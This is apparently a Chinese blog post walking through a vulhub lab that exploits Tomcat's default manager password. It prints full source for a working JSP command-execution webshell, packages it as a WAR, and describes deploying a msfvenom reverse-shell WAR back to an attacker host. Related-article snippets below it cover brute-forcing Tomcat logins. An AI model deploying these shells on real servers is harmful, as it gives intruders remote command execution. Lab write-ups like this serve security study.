Tomcat弱口令漏洞

最新推荐文章于 2024-04-21 23:55:54 发布
最新推荐文章于 2024-04-21 23:55:54 发布
阅读量1.8k 收藏 6
点赞数 2
分类专栏: 中间件漏洞 文章标签: tomcat 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/116903953
版权

Tomcat弱口令漏洞


漏洞原理:传送门

实验环境

主机角色IP
centos8漏洞靶机192.168.1.80
kalimsf生成木马,接收shell192.168.1.128
windows10攻击机192.168.1.120

实验流程

开启漏洞靶机centos8

# 开启docker服务
service docker start
# 切换到vulhub目录
cd /usr/sbin/vulhub/tomcat/tomcat8
# 创建镜像
docker-compose build
# 开启镜像
docker-compose up -d

尝试访问漏洞页面:

image-20210516193255115

如图所示,访问成功!

进入镜像配置文件查看初始密码:

# 进入镜像
docker exec -it 镜像id /bin/bash
# 切换到配置目录
cd /usr/local/tomcat/conf
# 查看配置文件
cat tomcat-users.xml

image-20210516193622522

如图所示,可以看出tomcat管理页面的用户名和密码都是tomcat,存在明显的弱口令漏洞。

输入用户名和密码,成功登录到tomcat管理页面:

image-20210516193327450

第一种方式上传webshell

准备一个木马文件shell.jsp

内容如下:

<%@
page language="java"
import="java.util.*,java.io.*"
pageEncoding = "UTF-8"
%>
<%!public static String excuteCmd(String c) {
	StringBuilder line = new StringBuilder();
	try {
		Process pro = Runtime.getRuntime().exec(c);
		BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
		String temp = null;
		while ((temp = buf.readLine()) != null){
			line.append(temp+"\\n");
		}
		buf.close();
	} catch (Exception e) {
		line.append(e.getMessage());
	}
	return line.toString();
}
%>
<%
if(!"".equals(request.getParameter("cmd"))){
	out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{
	out.println(":-)");
}
%>

在windows10的dos界面下,将shell.jsp打包为shell.war,用于javaweb包的热部署

打包命令为jar cvf shell.war shell.jsp

image-20210516195051701

如下图所示,成功打包为shell.war:

image-20210516195152558

将shell.war包上传到javaweb应用中:

image-20210516195342023

如下图所示,上传并部署成功:

image-20210516195430303

尝试访问木马文件,并传入命令参数:

image-20210516195652287

如图所示,成功回显命令执行结果。


第二种方式msf反弹shell

在kali主机,利用msfvenom工具生成war文件木马:

LHOST=kali的IP

LPORT=kali的端口(任意)

image-20210516200320992

如图所示,生成完毕。

将生成的木马文件下载下来到window主机:

image-20210516200348508

如图所示,下载完毕:

image-20210516200634337

将qianxun.war更改为qianxun.rar,并用压缩工具winrar打开:

image-20210516200652417

image-20210516200725625

如上图所示,在qianxun.war包中还有木马文件vzajtnpod.jsp,记下文件名后,将qianxun.rar重新改回为qianxun.war

将木马文件qianxun.war上传到javaweb应用中:

image-20210516200505574

在kali主机上开启msfconsole监听:

image-20210516201245931

在浏览器中访问该木马文件:

image-20210516201408253

再回到kali,发现shell已被成功反弹:

image-20210516201222722

至此,实验完毕。

0ak1ey
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat弱口令专项扫描工具.zip
03-24
Tomcat弱口令扫描工具
tomcat管理界面弱口令扫描
08-30 4356
关于tomcat弱口令扫描问题,应当注意两点。第一是版本问题。 在tomcat6及6之前,是可以直接暴力破解的。 抓一下tomcat登陆管理界面的数据包,可以看出,其认证方式是在http的请求header中添加一个字段为 Authorization,这个字段的值是 “Basic base64(username:password)”,因此在暴力破解时,只需要在请求包中添加该字段即可。 在tom...
Tomcat+弱口令&后台Getshell漏洞复现
weixin_60329395的博客
08-03 1190
漏洞影响范围:Tomcat 8.0版本、漏洞类型:弱口令、任意文件上传、漏洞成因:在tomcat8环境下,默认的后台密码为tomcat:tomcat,未修改默认密码就会造成未经授权的后台访问后台存在war包绕过
Tomcat弱口令及war包漏洞复现(保姆级教程)
最新发布
m0_69043895的博客
04-21 1457
这里我们采用针对同一弱口令去爆破不同账号的方式进行猜解,将可能存在的username放入position1的位置,其次放置password在position3的位置,最后attack时爆破的顺序如下图,就不会针对同一账号锁定。CSDN上有个脚本利用的是占满tomcat缓存的方式绕过,当同一账号大于5次登录,就会采用脏数据去进行登录,直到缓存占满后,又会用剩下的可能存在的username进行登录。链接的地址是 /zip文件的前缀/文件名,比如我这里就是http://IP/shell/shell.jsp。
Tomcat 弱口令 && 后台getshell漏洞
weixin_46601374的博客
04-05 7516
漏洞编号 VUL-2021040008 爆发时间 2018-10-10 漏洞简介 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 影响版本 Tomcat8.x,Tomcat7.x 漏洞详情 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) 1、manager-gui 拥
漏洞复现 - - -Tomcat弱口令漏洞
weixin_67503304的博客
08-07 7345
通过弱口令的方法爆破tomcat漏洞,通过上传war包拿到shell,简单的弱口令漏洞复现。
Tomcat 弱口令及文件上传漏洞复现
君莫hacker的博客
09-16 3069
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现 0x01 漏洞介绍 漏洞描述 漏洞编号 受影响版本 0x02 环境部署: 搭建一次,复现百次 靶机 ip:192.168.30.209 kali ip:192.168.30.182 0x03 漏洞复现 从github下载tomcat8的源码,我们可以查看tomcat的默认登录名为tomcat,并且密码也为tomcat 点击Server Status进行登录 弱口令tomcat tomcat 直接登录成功 发现文件上传点
Tomcat漏洞(弱口令war包)详解
xinyue9966的博客
02-17 4862
后台弱口令上传war包 影响版本:Tomcat版本:7.0–>8.0 影响说明:后台弱口令登录,上传webshell 环境说明:PHP5.5.38 、 Apache2.4.10、Tomcat 8.0.43 环境搭建 东塔靶场 漏洞原理 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理tomcat是一个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上
tomcat工具
07-03
【标题】:“Tomcat工具” 【描述】:“用于Eclipse里的Tomcat的安装” 在Java Web开发中,Tomcat是一个非常流行的开源应用服务器,它主要负责运行Servlet和JSP应用程序。Tomcat是Apache软件基金会的Jakarta项目的...
tomcat漏洞总结.rar
04-21
本文件包含Tomcat近几年爆发的4个严重漏洞,包含从tomcat弱口令上传,到tomcatPUT上传小马,本地权限提升一级反序列化漏洞,其中弱口令包含2本字典以及详细用法,PUT上传包含POC,反序列化和权限提升包含代码及详细...
弱口令字典(ftp/oracle/tomcat/domino)、web目录
04-14
这些给定的文件名表明它们包含了一系列针对不同服务和应用的弱口令字典,包括FTP、Oracle数据库、Tomcat应用服务器、Domino服务器以及Web目录扫描。下面将详细解释这些服务与弱口令关联的知识点。 1. **FTP(File ...
Apache Tomcat Scanner
03-15
Apache Tomcat Scanner是一款专门针对Apache Tomcat服务器的安全工具,它设计用于检测和识别Tomcat服务器可能存在的一些安全漏洞,特别是弱口令问题。Apache Tomcat是一款广泛使用的开源Java Servlet容器,它实现了...
Tomcat漏洞利用实践
yyj1781572的博客
04-02 1254
本实验将带领大家实际操作攻击tomcat以及如何修复其漏洞。在配置Tomcat的时候使用了常用的用户名和弱口令,导致Tomcat可被攻击者登陆,并利用manager中的war部署功能上传恶意脚本最终导致服务器沦陷。
Tomcat控制台密码漏洞
Kevin's Blog
07-23 4415
文章目录一、漏洞介绍1.1 漏洞原理1.2 影响版本1.3 触发条件二、环境搭建2.1 环境信息2.2 tomcat配置2.3 配置漏洞环境三、攻击过程四、漏洞修复 一、漏洞介绍 1.1 漏洞原理   Tomcat支持后台部署War文件,默认情况下管理页面仅允许本地访问,如果网站运维/开发人员手动修改配置文件中的信息允许远程IP进行访问(需求),且恶意攻击者拿到管理界面账户密码情况下,则可上传木马文件,控制系统。 1.2 影响版本 全版本 1.3 触发条件 默认配置文件已被修改,允许非本地访问 攻击者
Metasploit爆破Tomcat弱口令
→_→
08-17 1267
声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。 [实验目的] 1) 利用 Tomcat弱口令漏洞,破解出登陆密码,获得目标主机会话。 [实验原理] 1) 利用枚举的方法破解Tomcat弱口令。 [实验环境] [实验步骤] 一、利用nmap工具扫描目标主机 1.1 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放8081端口并且运行着ApacheTomcat/C...
漏洞复现(vulhub tomcat弱口令漏洞
qq_53409748的博客
02-16 735
vulhub上的tomcat弱口令漏洞
Tomcat 密码爆破 漏洞复现
Senimo
05-03 4396
Tomcat 密码爆破漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf\tomcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+ 权限分为: manager(后台管理) manager-gui
【墨者学院】Tomcat后台弱口令漏洞利用
weixin_43884770的博客
12-06 1338
背景介绍 “墨者”安全工程师发现某个基于Tomcat的Web服务器后台存在漏洞,你也一起来学习吧。 实训目标 1、了解Tomcat服务器的基本操作; 2、了解Tomcat服务器War包部署功能; 解题方向 网站常用后台密码登录,部署war包。 解题思路: 随便点击一个地方会跳出登录页面,发现提示输入用户名密码,题目提示存在弱口令,于是网上查找了tomcat默认的用户名密码,发现都不对,最后自己...
tomcat弱口令复现
09-23
要复现Tomcat弱口令漏洞,可以按照以下步骤进行操作: 1. 找到Tomcat安装目录下的conf/tomcat-users.xml文件。 2. 使用文本编辑器打开tomcat-users.xml文件。 3. 查找并找到带有用户名和密码的<user>元素。 4....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值